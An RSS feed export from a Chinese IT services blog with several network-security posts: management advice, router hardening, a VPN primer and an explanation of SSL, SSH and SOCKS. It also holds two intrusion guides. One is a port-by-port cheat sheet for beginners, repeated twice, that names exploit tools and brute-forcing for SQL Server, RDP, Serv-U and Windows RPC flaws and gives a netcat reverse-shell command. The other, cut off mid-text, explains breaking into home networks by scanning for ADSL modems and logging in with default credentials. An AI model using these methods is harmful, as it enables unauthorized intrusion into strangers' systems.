﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客-金华网站建设-义乌网站建设-浙江网站建设-随笔分类-网络安全区</title><link>http://www.cnitblog.com/zhangyafei/category/4519.html</link><description>金华网页设计-义乌网页设计服务-浙江网络安全维护 提供企业网络安全维护、企业网站建设、企业网站维护、企业服务器维护等服务(金华服务器维护-义乌服务器维护),咨询: 张先生 15924245918  QQ：77883459</description><language>zh-cn</language><lastBuildDate>Wed, 05 Oct 2011 20:07:01 GMT</lastBuildDate><pubDate>Wed, 05 Oct 2011 20:07:01 GMT</pubDate><ttl>60</ttl><item><title>推荐:四个建议做好网络安全</title><link>http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21928.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Tue, 16 Jan 2007 09:20:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21928.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21928.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21928.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21928.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21928.html</trackback:ping><description><![CDATA[
		<span class="bold">推荐:四个建议做好网络安全</span>
		<br />
		<br />
		<div style="FONT-SIZE: 11px">信息安全不仅是技术问题，也是管理问题，没有完善的管理，降低安全风险只是空谈。<br /><br />　　信息安全所受到的重视程度一直在上升，我国政府主管部门频频出台一系列政策法规，直接牵引、推进信息安全的应用和发展，各类安全产品也层出不穷。然而，多方的重视并没有缓解安全面临的严峻形势。<br /><br />　　比如，很多企业习惯于在多处部署不同的安全产品以期达到全面的安全效果，但依赖于安全产品的简单堆积来应对“日新月异”的攻击手段和病毒传播是无法持续有效的。相反，每个安全产品产生海量的安全事件造成严重的信息过载，各类安全产品“各自为政”，不同产品之间的安全信息无法共享，形成一个个“信息孤岛”，管理员缺乏应付混合型安全威胁的能力。海量事件、定位困难、事件间不能关联呈现，导致管理员无法及时准确地发现网络中的安全隐患，进而加以处理。而安全事件不能及时处理往往会带来更大更严重的危害。<br /><br />　　实际上，信息安全只有通过实施一整套恰当的控制措施才能实现，这些控制措施包括策略、实践、步骤、组织结构和软件功能。信息安全管理的核心是安全风险管理，它涉及到多个要素:资产、资产价值、威胁、脆弱性、风险、防护需求、防护措施它们之间的关系如附图所示。<br /><br />　　分析安全管理的关系图，我们不难发现，安全管理是一个动态管理的过程，会随着时间的推移和业务的发展而变化。许多企业尽管拥有了先进而昂贵的信息安全设备，但“政策”或“人”往往无法配合，产生了很大问题。因为许多安全问题不是因为产品的功能不佳造成的。即使企业设置了层层关卡，仍可能因为被破解的管理者密码、帮助台维修后未关闭的开放权限、轻易被共享的网络文件夹等管理盲点，为黑客及病毒开启后门。因此，企业信息安全是管理问题，而非单纯的技术问题。唯有完善的管理，才能降低安全风险，避免不必要的损失。为了做好安全管理，笔者建议从以下几方面着手:<br /><br />　　1. 提升组织的整体安全意识<br /><br />　　要高度重视信息安全管理，切实加强领导，以高度的责任感进一步推进信息化建设和信息安全管理。对信息安全管理工作引起足够的重视，在加强信息系统的软硬件建设的同时，对信息安全管理工作也不能松懈和忽视。企业的信息安全政策不应再单单是信息部门的责任，企业对于组织安全的认知，应通过整体安全分析与定期安全检查获得提升。<br /><br />　　2. 强化执行作业程序<br /><br />　　一方面我们在信息化建设过程中严格执行信息安全标准，减少内部的弱点和威胁，使安全隐患不再有机可乘;另一方面对于安全事件的处置，提倡强制实施应变作业流程，并针对特定目标提供安全训练，协助建立必要的作业程序，以及时发现安全隐患、降低并控制安全事件的损害。<br /><br />　　3. 提升应变能力<br /><br />　　信息安全技术的日新月异，使得安全管理有着很大的不确定性。再严密的安保措施也不能保证网络安全的万无一失，因此必须增强信息安全管理的危机处理能力，将危机处理程序标准化，在危机来临之际，采取有效措施，积极将损失减少到最小程度。同时针对各种安全事件拟定一套顺畅且有效的应变措施，如为了封堵某一网络蠕虫病毒的传播，自动配置防火墙，阻塞已中病毒主机的IP地址或者该病毒传播所利用的TCP/UDP端口等等。<br /><br />　　4. 构建安全环境 <br /><br />网络安全和信息安全是信息资源共享的前提，发展信息化必须高度重视信息网络安全体系的建设。积极争取网络安全认证机构的合作和支持，同时加强信息安全技术平台的建设，加强企业内部的安全技术建设和监察管理工作，联合有关部门严厉打击危害计算机信息系统安全和利用计算机技术进行犯罪活动，保障行业信息安全。</div>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21928.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2007-01-16 17:20 <a href="http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21928.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>路由器保护内网安全九大步骤</title><link>http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21927.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Tue, 16 Jan 2007 09:19:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21927.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21927.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21927.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21927.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21927.html</trackback:ping><description><![CDATA[
		<span class="bold">路由器保护内网安全九大步骤</span>
		<br />
		<br />
		<div style="FONT-SIZE: 11px">对于大多数企业局域网来说，路由器已经成为正在使用之中的最重要的安全设备之一。一般来说，大多数网络都有一个主要的接入点。这就是通常与专用防火墙一起使用的“边界路由器”。 　　经过恰当的设置，边缘路由器能够把几乎所有的最顽固的坏分子挡在网络之外。如果你愿意的话，这种路由器还能够让好人进入网络。不过，没有恰当设置的路由器只是比根本就没有安全措施稍微好一点。<br />　　在下列指南中，我们将研究一下你可以用来保护网络安全的9个方便的步骤。这些步骤能够保证你拥有一道保护你的网络的砖墙，而不是一个敞开的大门。<br />　　<b>1.修改默认的口令！</b><br />　　据国外调查显示，80%的安全突破事件是由薄弱的口令引起的。网络上有大多数路由器的广泛的默认口令列表。你可以肯定在某些地方的某个人会知道你的生日。SecurityStats.com网站维护一个详尽的可用/不可用口令列表，以及一个口令的可靠性测试。<br />　　<b>2.关闭IP直接广播（IP Directed Broadcast）</b><br />　　你的服务器是很听话的。让它做什么它就做什么，而且不管是谁发出的指令。Smurf攻击是一种拒绝服务攻击。在这种攻击中，攻击者使用假冒的源地址向你的网络广播地址发送一个“ICMP echo”请求。这要求所有的主机对这个广播请求做出回应。这种情况至少会降低你的网络性能。<br />　　参考你的路由器信息文件，了解如何关闭IP直接广播。例如，“Central（config）#no ip source-route”这个指令将关闭思科路由器的IP直接广播地址。<br />　<b>　3.如果可能，关闭路由器的HTTP设置</b><br />　　正如思科的技术说明中简要说明的那样，HTTP使用的身份识别协议相当于向整个网络发送一个未加密的口令。然而，遗憾的是，HTTP协议中没有一个用于验证口令或者一次性口令的有效规定。<br />　　虽然这种未加密的口令对于你从远程位置（例如家里）设置你的路由器也许是非常方便的，但是，你能够做到的事情其他人也照样可以做到。特别是如果你仍在使用默认的口令!如果你必须远程管理路由器，你一定要确保使用SNMPv3以上版本的协议，因为它支持更严格的口令。<br />　　<b>4.封锁ICMP ping请求</b><br />　　ping的主要目的是识别目前正在使用的主机。因此，ping通常用于更大规模的协同性攻击之前的侦察活动。通过取消远程用户接收ping请求的应答能力，你就更容易避开那些无人注意的扫描活动或者防御那些寻找容易攻击的目标的“脚本小子”（script kiddies）。<br />　　请注意，这样做实际上并不能保护你的网络不受攻击，但是，这将使你不太可能成为一个攻击目标。<br />　　<b>5.关闭IP源路由</b><br />　　IP协议允许一台主机指定数据包通过你的网络的路由，而不是允许网络组件确定最佳的路径。这个功能的合法的应用是用于诊断连接故障。但是，这种用途很少应用。这项功能最常用的用途是为了侦察目的对你的网络进行镜像，或者用于攻击者在你的专用网络中寻找一个后门。除非指定这项功能只能用于诊断故障，否则应该关闭这个功能。<br />　<b>　6.确定你的数据包过滤的需求</b><br />　　封锁端口有两项理由。其中之一根据你对安全水平的要求对于你的网络是合适的。<br />　　对于高度安全的网络来说，特别是在存储或者保持秘密数据的时候，通常要求经过允许才可以过滤。在这种规定中，除了网路功能需要的之外，所有的端口和IP地址都必要要封锁。例如，用于web通信的端口80和用于SMTP的110/25端口允许来自指定地址的访问，而所有其它端口和地址都可以关闭。<br />　　大多数网络将通过使用“按拒绝请求实施过滤”的方案享受可以接受的安全水平。当使用这种过滤政策时，可以封锁你的网络没有使用的端口和特洛伊木马或者侦查活动常用的端口来增强你的网络的安全性。例如，封锁139端口和445（TCP和UDP）端口将使黑客更难对你的网络实施穷举攻击。封锁31337（TCP和UDP）端口将使Back Orifice木马程序更难攻击你的网络。<br />　　这项工作应该在网络规划阶段确定，这时候安全水平的要求应该符合网络用户的需求。查看这些端口的列表，了解这些端口正常的用途。<br />　　<b>7.建立准许进入和外出的地址过滤政策</b><br />　　在你的边界路由器上建立政策以便根据IP地址过滤进出网络的违反安全规定的行为。除了特殊的不同寻常的案例之外，所有试图从你的网络内部访问互联网的IP地址都应该有一个分配给你的局域网的地址。例如，192.168.0.1这个地址也许通过这个路由器访问互联网是合法的。但是，216.239.55.99这个地址很可能是欺骗性的，并且是一场攻击的一部分。<br />　　相反，来自互联网外部的通信的源地址应该不是你的内部网络的一部分。因此，应该封锁入网的192.168.X.X、172.16.X.X和10.X.X.X等地址。<br />　　最后，拥有源地址的通信或者保留的和无法路由的目标地址的所有的通信都应该允许通过这台路由器。这包括回送地址127.0.0.1或者E类（class E）地址段240.0.0.0-254.255.255.255。<br />　　<b>8.保持路由器的物理安全</b><br />　　从网络嗅探的角度看，路由器比集线器更安全。这是因为路由器根据IP地址智能化地路由数据包，而集线器相所有的节点播出数据。如果连接到那台集线器的一个系统将其网络适配器置于混乱的模式，它们就能够接收和看到所有的广播，包括口令、POP3通信和Web通信。<br />　　然后，重要的是确保物理访问你的网络设备是安全的，以防止未经允许的笔记本电脑等嗅探设备放在你的本地子网中。<br />　<b>　9.花时间审阅安全记录</b><br />　　审阅你的路由器记录（通过其内置的防火墙功能）是查出安全事件的最有效的方法，无论是查出正在实施的攻击还是未来攻击的征候都非常有效。利用出网的记录，你还能够查出试图建立外部连接的特洛伊木马程序和间谍软件程序。用心的安全管理员在病毒传播者作出反应之前能够查出“红色代码”和“Nimda”病毒的攻击。<br />　　此外，一般来说，路由器位于你的网络的边缘，并且允许你看到进出你的网络全部通信的状况。</div>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/21927.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2007-01-16 17:19 <a href="http://www.cnitblog.com/zhangyafei/archive/2007/01/16/21927.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>VPN技术详解（一）</title><link>http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21399.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Mon, 01 Jan 2007 12:06:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21399.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21399.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21399.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21399.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21399.html</trackback:ping><description><![CDATA[　<strong>一、引言 <br /></strong><br />　　虚拟专用网络可以实现不同网络的组件和资源之间的相互连接。虚拟专用网络能够利用Internet或其它公共互联网络的基础设施为用户创建隧道，并提供与专用网络一样的安全和功能保障。 
<p align="center"><img src="http://tech.csai.cn/web/images/20061094300.gif" /></p><p class="main">　　虚拟专用网络允许远程通讯方，销售人员或企业分支机构使用Internet等公共互联网络的路由基础设施以安全的方式与位于企业局域网端的企业服务器建立连接。虚拟专用网络对用户端透明，用户好象使用一条专用线路在客户计算机和企业服务器之间建立点对点连接，进行数据的传输。</p><p class="main">　　虚拟专用网络技术同样支持企业通过Internet等公共互联网络与分支机构或其它公司建立连接，进行安全的通讯。这种跨越Internet建立的VPN连接逻辑上等同于两地之间使用广域网建立的连接。</p><p class="main">　　虽然VPN通讯建立在公共互联网络的基础上，但是用户在使用VPN时感觉如同在使用专用网络进行通讯，所以得名虚拟专用网络。</p><p class="main">　　使用VPN技术可以解决在当今远程通讯量日益增大，企业全球运作广泛分布的情况下，员工需要访问中央资源，企业相互之间必须进行及时和有效的通讯的问题。</p><p class="main">　　如果希望企业员工无论身处何地都能够与企业计算资源建立连接，企业必须采用一个可靠性高、扩展性强的远程访问解决方案。一般的，企业有如下选择：</p><p class="main">　　1.管理信息系统（MIS）部门驱动方案。建立一个内部的MIS部门专门负责购买，安装和维护企业modem池和专用网络基础设施。 <br /><br />　　2.增值网络（VAN）方案。企业雇佣一个外部公司负责购买，安装和维护modem池和远程通讯网络基础设施。 <br /><br />　　从费用，可靠性，管理和便于连接等几方面来看，这两种方案都不能最大程度的满足企业对网络安全性或扩展性的要求。因此，选择一种基于Internet技术的廉价方案取代企业花费在modem池和专用网络基础设施上的投资就显得极为重要。</p><p class="main">　　<strong>二、虚拟专用网络的基本用途</strong></p><p class="main">　　<strong>通过Internet实现远程用户访问</strong></p><p class="main">　　虚拟专用网络支持以安全的方式通过公共互联网络远程访问企业资源。 </p><p align="center"><img src="http://tech.csai.cn/web/images/20061091296.gif" /></p><p class="main">　　与使用专线拨打长途或（1-800）电话连接企业的网络接入服务器（NAS）不同，虚拟专用网络用户首先拨通本地ISP的NAS，然后VPN软件利用与本地ISP建立的连接在拨号用户和企业VPN服务器之间创建一个跨越Internet或其它公共互联网络的虚拟专用网络。</p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21399.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2007-01-01 20:06 <a href="http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21399.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>传输层安全协议详解</title><link>http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21394.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Mon, 01 Jan 2007 06:52:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21394.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21394.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21394.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21394.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21394.html</trackback:ping><description><![CDATA[传输层安全协议的目的是为了保护传输层的安全，并在传输层上提供实现保密、认证和完整性的方法。<br /><br />1．SSL（安全套接字层协议）<br />SSL(Secure Socket Layer)是由Netscape设计的一种开放协议；它指定了一种在应用程序协议(例如http、telnet、NNTP、FTP)和TCP/IP之间提供数据安全性分层的机制。它为TCP/IP连接提供数据加密、服务器认证、消息完整性以及可选的客户机认证。<br />SSL的主要目的是在两个通信应用程序之间提供私密信和可靠性。这个过程通过3个元素来<br /><br />完成：<br /><br />l    握手协议。这个协议负责协商被用于客户机和服务器之间会话的加密参数。当一个SSL客户机和服务器第一次开始通信时，它们在一个协议版本上达成一致，选择加密算法，选择相互认证，并使用公钥技术来生成共享密钥。<br /><br />l    记录协议。这个协议用于交换应用层数据。应用程序消息被分割成可管理的数据块，还可以压缩，并应用一个MAC（消息认证代码）；然后结果被加密并传输。接受方接受数据并对它解密，校验MAC，解压缩并重新组合它，并把结果提交给应用程序协议。<br /><br />l    警告协议。这个协议用于指示在什么时候发生了错误或两个主机之间的会话在什么时候终止。<br /><br />下面我们来看一个使用WEB客户机和服务器的范例。WEB客户机通过连接到一个支持SSL的服务器，启动一次SSL会话。支持SSL的典型WEB服务器在一个与标准HTTP请求（默认为端口80）不同的端口（默认为443）上接受SSL连接请求。当客户机连接到这个端口上时，它将启动一次建立SSL会话的握手。当握手完成之后，通信内容被加密，并且执行消息完整性检查，知道SSL会话过期。SSL创建一个会话，在此期间，握手必须只发生过一次。<br /><br />SSL握手过程步骤：<br /><br />步骤1：SSL客户机连接到SSL服务器，并要求服务器验证它自身的身份。<br /><br />步骤2：服务器通过发送它的数字证书证明其身份。这个交换还可以包括整个证书链，直到某个根证书权威机构(CA)。通过检查有效日期并确认证书包含有可信任CA的数字签名，来验证证书。<br /><br />步骤3：然后，服务器发出一个请求，对客户端的证书进行验证。但是，因为缺乏公钥体系结构，当今的大多数服务器不进行客户端认证。<br /><br />步骤4：协商用于加密的消息加密算法和用于完整性检查的哈希函数。通常由客户机提供它支持的所有算法列表，然后由服务器选择最强健的加密算法。<br /><br />步骤5：客户机和服务器通过下列步骤生成会话密钥：<br />a.    客户机生成一个随机数，并使用服务器的公钥（从服务器的证书中获得）对它加密，发送到服务器上。<br />b.    服务器用更加随机的数据（从客户机的密钥可用时则使用客户机密钥；否则以明文方式发送数据）响应。<br />c.    使用哈希函数，从随机数据生成密钥。<br /><br />SSL协议的优点是它提供了连接安全，具有3个基本属性：<br />l    连接是私有的。在初始握手定义了一个密钥之后，将使用加密算法。对于数据加密使用了对称加密（例如DES和RC4）。<br />l    可以使用非对称加密或公钥加密（例如RSA和DSS）来验证对等实体的身份。<br />l    连接时可靠的。消息传输使用一个密钥的MAC，包括了消息完整性检查。其中使用了安全哈希函数（例如SHA和MD5）来进行MAC计算。<br /><br />对于SSL的接受程度仅仅限于HTTP内。它在其他协议中已被表明可以使用，但还没有被广泛应用。<br /><br />注意：<br />IETF正在定义一种新的协议，叫做“传输层安全”(Transport Layer Security,TLS)。它建立在Netscape所提出的SSL3.0协议规范基础上；对于用于传输层安全性的标准协议，整个行业好像都正在朝着TLS的方向发展。但是，在TLS和SSL3.0之间存在着显著的差别（主要是它们所支持的加密算法不同），这样，TLS1.0和SSL3.0不能互操作。<br /><br />2．SSH（安全外壳协议）<br />SSH是一种在不安全网络上用于安全远程登录和其他安全网络服务的协议。它提供了对安全远程登录、安全文件传输和安全TCP/IP和X-Window系统通信量进行转发的支持。它可以自动加密、认证并压缩所传输的数据。正在进行的定义SSH协议的工作确保SSH协议可以提供强健的安全性，防止密码分析和协议攻击，可以在没有全球密钥管理或证书基础设施的情况下工作的非常好，并且在可用时可以使用自己已有的证书基础设施（例如DNSSEC和X.509）。<br /><br />SSH协议由3个主要组件组成：<br />l    传输层协议，它提供服务器认证、保密性和完整性，并具有完美的转发保密性。有时，它还可能提供压缩功能。<br />l    用户认证协议，它负责从服务器对客户机的身份认证。<br />l    连接协议，它把加密通道多路复用组成几个逻辑通道。<br /><br />SSH传输层是一种安全的低层传输协议。它提供了强健的加密、加密主机认证和完整性保护。SSH中的认证是基于主机的；这种协议不执行用户认证。可以在SSH的上层为用户认证设计一种高级协议。<br /><br />这种协议被设计成相当简单而灵活，以允许参数协商并最小化来回传输的次数。密钥交互方法、公钥算法、对称加密算法、消息认证算法以及哈希算法等都需要协商。<br /><br />数据完整性是通过在每个包中包括一个消息认证代码(MAC)来保护的，这个MAC是根据一个共享密钥、包序列号和包的内容计算得到的。<br /><br />在UNIX、Windows和Macintosh系统上都可以找到SSH实现。它是一种广为接受的协议，使用众所周知的建立良好的加密、完整性和公钥算法。<br /><br />3．SOCKS协议<br /><br />“套接字安全性”(socket security,SOCKS)是一种基于传输层的网络代理协议。它设计用于在TCP和UDP领域为客户机/服务器应用程序提供一个框架，以方便而安全的使用网络防火墙的服务。<br /><br />SOCKS最初是由David和Michelle Koblas开发的；其代码在Internet上可以免费得到。自那之后经历了几次主要的修改，但该软件仍然可以免费得到。SOCKS版本4为基于TCP的客户机/服务器应用程序（包括telnet、FTP,以及流行的信息发现协议如http、WAIS和Gopher）提供了不安全的防火墙传输。SOCKS版本5在RFC1928中定义，它扩展了SOCKS版本<br /><br />4，包括了UDP；扩展了其框架，包括了对通用健壮的认证方案的提供；并扩展了寻址方案，包括了域名和IPV6地址。<br /><br />当前存在一种提议，就是创建一种机制,通过防火墙来管理IP多点传送的入口和出口。这是通过对已有的SOCKS版本5协议定义扩展来完成的，它提供单点传送TCP和UDP流量的用户级认证防火墙传输提供了一个框架。但是，因为SOCKS版本5中当前的UDP支持存在着可升级性问题以及其他缺陷（必须解决之后才能实现多点传送），这些扩展分两部分定义。<br />l    基本级别UDP扩展。<br />l    多点传送UDP扩展。<br /><br />SOCKS是通过在应用程序中用特殊版本替代标准网络系统调用来工作的（这是为什么SOCKS有时候也叫做应用程序级代理的原因）。这些新的系统调用在已知端口上（通常为1080/TCP）打开到一个SOCKS代理服务器（由用户在应用程序中配置，或在系统配置文件中指定）的连接。如果连接请求成功，则客户机进入一个使用认证方法的协商，用选定的方法认证，然后发送一个中继请求。SOCKS服务器评价该请求，并建立适当的连接或拒绝它。当建立了与SOCKS服务器的连接之后，客户机应用程序把用户想要连接的机器名和端口号发送给服务器。由SOCKS服务器实际连接远程主机，然后透明地在客户机和远程主机之间来回移动数据。用户甚至都不知道SOCKS服务器位于该循环中。<br /><br />使用SOCKS的困难在于，人们必须用SOCKS版本替代网络系统调用（这个过程通常称为对应用程序SOCKS化---SOCKS-ification或SOCKS-ifying）。幸运的是，大多数常用的网络应用程序（例如telnet、FTP、finger和whois）都已经被SOCKS化，并且许多厂商现把SOCKS支持包括在商业应用程序中。<img height="1" src="http://www.3800cc.com/info/down_info.asp?id=7229" width="1" border="0" /><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21394.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2007-01-01 14:52 <a href="http://www.cnitblog.com/zhangyafei/archive/2007/01/01/21394.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>总结各个网络端口的入侵</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21373.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Sun, 31 Dec 2006 12:15:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21373.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21373.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21373.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21373.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21373.html</trackback:ping><description><![CDATA[希望对新手入侵有帮助！ 
<p></p><p>1. 1433端口入侵 </p><p>scanport.exe 查有1433的机器 </p><p>SQLScanPass.exe 进行字典暴破（字典是关键） </p><p>最后 SQLTools.exe入侵 </p><p>对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 </p><p>nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 </p><p>（以上反向的，测试成功） </p><p>sqlhelloz.exe 入侵ip 1433 （这个是正向连接） </p><p>2. 4899端口入侵 </p><p>用4899过滤器.exe，扫描空口令的机器 </p><p>3. 3899的入侵 </p><p>对很早的机器，可以试试3389的溢出(win3389ex.exe) </p><p>对2000的机器，可以试试字典暴破。(tscrack.exe) </p><p>4. 80入侵 </p><p>对sp3以前的机器，可以用webdav入侵； </p><p>对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） </p><p>可以利用SQL进行注入。（啊D的注入软件）。 </p><p>5. serv-u入侵(21端口） </p><p>对5. 004及以下系统，可用溢出入侵。（serv5004.exe） </p><p>对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe） </p><p>对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs） </p><p>输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码 </p><p>6. 554端口 </p><p>用real554.exe入侵。 </p><p>7. 6129端口 </p><p>用DameWare6129.exe入侵。 </p><p>8. 系统漏洞 </p><p>利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， </p><p>进行溢出入侵。 </p><p>9. 3127等端口 </p><p>可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 </p><p>10. 其他入侵 </p><p>利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。 </p><p>希望对新手入侵有帮助！ </p><p>1. 1433端口入侵 </p><p>scanport.exe 查有1433的机器 </p><p>SQLScanPass.exe 进行字典暴破（字典是关键） </p><p>最后 SQLTools.exe入侵 </p><p>对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 </p><p>nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 </p><p>（以上反向的，测试成功） </p><p>sqlhelloz.exe 入侵ip 1433 （这个是正向连接） </p><p>2. 4899端口入侵 </p><p>用4899过滤器.exe，扫描空口令的机器 </p><p>3. 3899的入侵 </p><p>对很早的机器，可以试试3389的溢出(win3389ex.exe) </p><p>对2000的机器，可以试试字典暴破。(tscrack.exe) </p><p>4. 80入侵 </p><p>对sp3以前的机器，可以用webdav入侵； </p><p>对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） </p><p>可以利用SQL进行注入。（啊D的注入软件）。 </p><p>5. serv-u入侵(21端口） </p><p>对5. 004及以下系统，可用溢出入侵。（serv5004.exe） </p><p>对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe） </p><p>对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs） </p><p>输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码 </p><p>6. 554端口 </p><p>用real554.exe入侵。 </p><p>7. 6129端口 </p><p>用DameWare6129.exe入侵。 </p><p>8. 系统漏洞 </p><p>利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， </p><p>进行溢出入侵。 </p><p>9. 3127等端口 </p><p>可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。 </p><p>10. 其他入侵 </p><p>利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。 </p><img src ="http://www.cnitblog.com/zhangyafei/aggbug/21373.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-31 20:15 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21373.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>教你穿透ADSL路由入侵内网</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21372.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Sun, 31 Dec 2006 12:14:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21372.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/21372.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/31/21372.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/21372.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/21372.html</trackback:ping><description><![CDATA[
		<strong>教你穿透ADSL路由入侵内网<br /></strong>
		<br />也许看烂了网上已有的常规黑客攻击手段，对一些陈旧的入侵手法早已厌烦，近来我对ADSL MODEM的 路由功能产生了浓厚的兴趣，经过一番努力，我终于找到了穿透ADSL路由入侵内网的方法，在这里和各位一起分享我的心得 
<p></p><p><br />一.扫描 </p><p><br />现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理，但80 21端口有很多服务器都有打开，没怎么特征性，于是我选择了23端口，打开我的至爱：SUPPERSCAN，填上我所在地区的IP段，（跨多几段都没关系，反正SUPPERSCAN的速度就是快）眨眼间，结果出来了，开23的主机还真不小啊：）我挑了几台出来，在浏览器那里输入IP：218.xxx.xxx.xxx，OK。登陆对话框出来了，输入USER：ADSL pass:adsl1234（因为我这里的adsl modem一般是华硕的，缺省是adsl adsl1234）bingle 一矢中的，现在我就是上帝。 </p><p><br />二.映射 </p><p><br />入侵已经成功了一半，要进一步入侵内网，我门要进行端口映射，但是我连内网的拓扑，都不知道（更不用说内网主机的端口开放情况了）又怎么映射呢？在此，我选择了猜测。一般来说，MODEM的内网IP缺省是192.168.1.1，而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192。168。1。2的端口映射出来就行了（但如果使用了dhcp就麻烦了）但是192。168。1。2到底开放了什么端口，我们根本就不知道啊，呵呵，既然不知道，那么我就把他整台主机透明地映射到外网，具体做法如下：进入NAT选项---添加NAT规则---BAMID---填入主机IP：192。168。1。2，到此192。168。1。2已经透明地映射到192。168。1。1上了，我们访问ADSL MODEM就等于访问主机192。168。1。2了 </p><p><br />三。检测漏洞 </p><p><br 